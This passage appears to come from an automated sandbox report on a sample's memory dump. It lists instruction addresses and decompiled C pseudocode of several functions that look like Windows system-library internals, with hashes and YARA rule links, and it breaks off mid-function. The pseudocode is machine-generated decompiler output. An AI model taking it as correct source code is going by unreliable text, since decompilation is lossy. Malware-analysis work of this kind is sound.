0x04dd0ecd
0x04dd105b
0x04dd105b
0x04dd1061
0x04dd1066
0x04dd1066
0x04dd106b
0x04dd1073
0x04dd1073
0x04dd0ed3
0x04dd0ed6
0x04dd0edc
0x04dd0ee0
0x04dd0ee7
0x04dd0ef0
0x04dd0ef5
0x04dd0efa
0x04dd0efc
0x04dd0efd
0x04dd0f03
0x04dd0f04
0x04dd0f06
0x04dd0f07
0x04dd0f09
0x04dd0f0e
0x04dd0f14
0x04dd0f23
0x04dd0f2d
0x04dd0f34
0x04dd0f34
0x04dd0f14
0x04dd0f52
0x00000000
0x00000000
0x04dd0f58
0x04dd0f73
0x04dd0f74
0x04dd0f79
0x04dd0f7d
0x04dd0f80
0x04dd0f86
0x04dd0fab
0x04dd0fb5
0x04dd0fc6
0x04dd0fd1
0x04dd0fe3
0x04dd0fd3
0x04dd0fdc
0x04dd0fdc
0x04dd0feb
0x04dd1009
0x04dd1009
0x04dd1015
0x04dd1027
0x04dd1017
0x04dd1020
0x04dd1020
0x04dd102f
0x04dd103c
0x04dd103c
0x04dd1048
0x04dd1050
0x04dd1050
0x04dd1055
0x00000000
0x04dd1055
0x04dd0f88
0x04dd0f9e
0x04dd0fa2
0x04dd0fa9
0x00000000
0x00000000
0x00000000
0x04dd0fa9
0x00000000

Strings

`, xrefs: 04DD0F16

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 874ab1097e2ada336d63768470d3bf3699aadda3e69a579a0b9fcb2f23cdfcf4
Instruction ID: 037ff111ffc29e90920e2bc510db1181a27a2c5491065c47d1527ac8075c2087
Opcode Fuzzy Hash: 874ab1097e2ada336d63768470d3bf3699aadda3e69a579a0b9fcb2f23cdfcf4
Instruction Fuzzy Hash: 90516A713083429FE325EF28D984B2BB7E5EBC4708F144A2DF99697291D671F805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04D3F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04D3F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04D24120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04D49830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04D49990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04D495D0();
							goto L11;
						} else {
							_t109 = L04D24620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E04D4F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04D495D0();
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x04d3f0d3
0x04d3f0d9
0x04d3f0e0
0x04d3f0e7
0x04d3f0f2
0x04d3f0f4
0x04d3f0f8
0x04d3f100
0x04d3f108
0x04d3f10d
0x04d3f115
0x04d3f116
0x04d3f11f
0x04d3f123
0x04d3f124
0x04d3f12c
0x04d3f130
0x04d3f134
0x04d3f13d
0x04d3f144
0x04d3f14b
0x04d3f152
0x04d7bab0
0x04d7bab0
0x04d3f158
0x04d3f158
0x04d3f15a
0x04d3f160
0x04d3f165
0x04d3f166
0x04d3f16f
0x04d3f173
0x04d7baa7
0x04d7baa7
0x04d7baab
0x00000000
0x04d3f179
0x04d3f18d
0x04d3f191
0x04d7baa2
0x00000000
0x04d3f197
0x04d3f19b
0x04d3f1a2
0x04d3f1a9
0x04d3f1af
0x04d3f1b2
0x04d3f1b6
0x04d3f1b9
0x04d3f1c4
0x04d3f1d8
0x04d3f1df
0x04d3f1e3
0x04d3f1eb
0x04d3f1ee
0x04d3f1f4
0x04d3f20f
0x04d7bab7
0x04d7babb
0x04d7bacc
0x04d7bad1
0x04d3f215
0x04d3f218
0x04d3f226
0x04d3f22b
0x00000000
0x04d3f22b
0x04d3f1f6
0x04d3f1f6
0x04d3f1f9
0x04d3f1fb
0x04d3f1fb
0x04d3f1f4
0x04d3f191
0x04d3f173
0x04d3f152
0x04d3f203

Strings

@, xrefs: 04D3F124

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 95debcb1a89be07c268f00408ccc05179144c5d019bc8a94c8d77a462235d0e9
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 125180716047149FD321DF29C840A67BBF4FF88714F108A2EF99597650E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D3D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E04D3D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4dfd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04D24120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04D4B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04D498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04D495D0();
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x04d3d29c
0x04d3d2a6
0x04d3d2b1
0x04d3d2b5
0x04d3d2b6
0x04d3d2bc
0x04d3d2bd
0x04d3d2be
0x04d3d2bf
0x04d3d2c2
0x04d3d2c4
0x04d3d2cc
0x04d3d384
0x04d3d34b
0x04d3d34f
0x04d3d350
0x04d3d351
0x04d3d35c
0x04d3d35c
0x04d3d2d6
0x04d3d2da
0x04d3d2e1
0x04d3d361
0x04d3d369
0x04d3d36d
0x04d3d2e3
0x04d3d2e3
0x04d3d2e3
0x04d3d2e5
0x04d3d2ed
0x04d3d2f5
0x04d3d2fa
0x04d3d302
0x04d3d303
0x04d3d30b
0x04d3d30f
0x04d3d313
0x04d3d318
0x04d3d31c
0x04d3d320
0x04d3d379
0x04d3d37d
0x00000000
0x00000000
0x04d7affe
0x04d7b001
0x04d7b011
0x00000000
0x04d3d322
0x04d3d322
0x04d3d330
0x04d3d337
0x04d3d35d
0x04d3d339
0x04d3d33f
0x04d3d38c
0x04d3d38c
0x04d3d33f
0x04d3d349
0x00000000
0x04d3d349

Strings

@, xrefs: 04D3D303

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: bd591c1e66784f261c5e243bc6acf8bca6aa59e946b56bdb84ce299e9471414f
Instruction ID: a06febc7f5a2d77fa573c99c4ee8799457bf627c5ee00c681de838cf9aa88661
Opcode Fuzzy Hash: bd591c1e66784f261c5e243bc6acf8bca6aa59e946b56bdb84ce299e9471414f
Instruction Fuzzy Hash: 7231A4B16083459FD721DF28C98096BBBE9FBD5754F00092EF99593210E638ED08DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 04DB8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04DB8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4de0d50);
				E04D5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04D95720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04D5DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04D5DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04D5D130(_t34, _t39, _t40);
			}

0x04db8df1
0x04db8df1
0x04db8df1
0x04db8df1
0x04db8df1
0x04db8df1
0x04db8df3
0x04db8df8
0x04db8dfd
0x04db8e00
0x04db8e0e
0x04db8e2a
0x04db8e36
0x04db8e38
0x04db8e3c
0x04db8e46
0x04db8e46
0x04db8e36
0x04db8e50
0x04db8e56
0x04db8e59
0x04db8e5c
0x04db8e60
0x04db8e67
0x04db8e6d
0x04db8e73
0x04db8e74
0x04db8eb1
0x04db8ebd

Strings

Critical error detected %lx, xrefs: 04DB8E21

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 48ccdcd5eeeb1f9a62f8f38befb6bfe4e783f6b6532e702fa9917402b67a9372
Instruction ID: c42cf670e8a51704f40a0887259b140085b359756116d76877e18aa5addf7d47
Opcode Fuzzy Hash: 48ccdcd5eeeb1f9a62f8f38befb6bfe4e783f6b6532e702fa9917402b67a9372
Instruction Fuzzy Hash: 4411CB71E00308DBEF25EFA888057DCBBB5FB04704F24822DE4AAAB291C7316601DF24

Uniqueness

Uniqueness Score: -1.00%

Function 04D9FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04D9FF60

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: ad4e8953a9ddf0515da04e304e152e3161058ab6631b7664bd2dc6fb60419e48
Instruction ID: fdb4579dc43eb9f424e3c61363e23319fbd6c3173cd0c50774d6fb489bca8b5e
Opcode Fuzzy Hash: ad4e8953a9ddf0515da04e304e152e3161058ab6631b7664bd2dc6fb60419e48
Instruction Fuzzy Hash: F6118E71610144AFEF22EF50C948F9877F2FB04709F158059E608972A1C739BD44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04DD5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04DD5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4de1178);
				E04D5D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04DD4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04D4D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04DD5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4df60e8;
								if( *0x4df60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4df60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04D49710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04D46DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04D4F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04D4F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04D4F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04D4FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
